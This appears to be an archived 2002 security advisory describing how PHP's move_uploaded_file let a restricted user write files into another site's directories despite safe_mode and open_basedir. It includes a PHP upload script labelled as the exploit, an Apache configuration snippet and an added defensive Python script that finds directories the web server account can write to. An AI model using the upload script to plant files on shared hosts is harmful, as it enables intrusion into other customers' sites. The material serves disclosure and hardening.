20th Mar 2002 [SBWID-5192]
COMMAND
PHP safe mode broken via "move_uploaded_file" directive
SYSTEMS AFFECTED
Php ??
PROBLEM
Tozz reported :
It's possible to circumvent PHP safe_mode restrictions by using
move_uploaded_file.
Exploit :
=======
<?
$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];
$size_limit = "100000"; // set size limit in bytes
if ($file) {
    if ($size < $size_limit) {
        move_uploaded_file($temp,
            "/domains/somebodyelse.org/public_html/www/test/".$file);
        echo "The file <tt>$file</tt> was successfully uploaded";
    } else {
        echo "Sorry, your file exceeds the size limit of $size_limit bytes";
    }
}
echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>
The attacker moved the uploaded file to
"/domains/somebodyelse.org/public_html/www/test/". While the user is
restricted with both safe_mode and open_basedir, this user is able to
upload any file where the Apache user has write access.
Virtualhost configuration snippet:
<VirtualHost IP_HERE>
DocumentRoot /domains/whatever.com/public_html/root/
ServerName root.whatever.com
CustomLog /domains/whatever.com/logs/access_log combined
ErrorLog /domains/whatever.com/logs/error_log
php_admin_value safe_mode 1
php_admin_value open_basedir /domains/whatever.com/public_html/root/
</VirtualHost>
SOLUTION
A patch was committed to CVS; a release should go out anytime soon.
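Added example (not part of the original advisory and not the PHP fix): since the report says the bypass reaches any location where the apache user has write access, this Python script lists the directories under a hosting root that a given account can create files in, judged from mode bits. The sample tree reuses the advisory's domain names but is constructed, and the uid standing in for the web server account is an assumption.

```python
import os
import tempfile

def effective_bits(st, uid, gids):
    """rwx bits (0-7) that apply to uid/gids under the classic owner/group/other rule."""
    if st.st_uid == uid:
        return (st.st_mode >> 6) & 7
    if st.st_gid in gids:
        return (st.st_mode >> 3) & 7
    return st.st_mode & 7

def writable_dirs(root, uid, gids):
    """Directories under root where the account may create files (needs w and x).

    Only mode bits are consulted: ACLs and parent-directory traversal are not
    checked, so treat each hit as a candidate to review.
    """
    hits = []
    for dirpath, _dirs, _files in os.walk(root):  # does not follow symlinks
        if effective_bits(os.stat(dirpath), uid, gids) & 0o3 == 0o3:
            hits.append(os.path.relpath(dirpath, root))
    return sorted(hits)

# Constructed layout reusing the advisory's domain names (not real data).
SAMPLE = {
    "whatever.com/public_html/root": 0o755,
    "somebodyelse.org/public_html/www/test": 0o777,  # world-writable upload dir
}

def build_sample(root):
    """Create the sample tree with fixed modes, independent of the umask."""
    for rel in SAMPLE:
        os.makedirs(os.path.join(root, rel), exist_ok=True)
    for dirpath, _dirs, _files in os.walk(root):
        os.chmod(dirpath, 0o755)
    for rel, mode in SAMPLE.items():
        os.chmod(os.path.join(root, rel), mode)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        web_uid = os.stat(tmp).st_uid + 1  # assumed stand-in for the apache account
        for d in writable_dirs(tmp, web_uid, set()):
            print("web server account can write:", d)
```

On a real host, run it as root against the hosting root with the uid and group ids of the account the web server runs as.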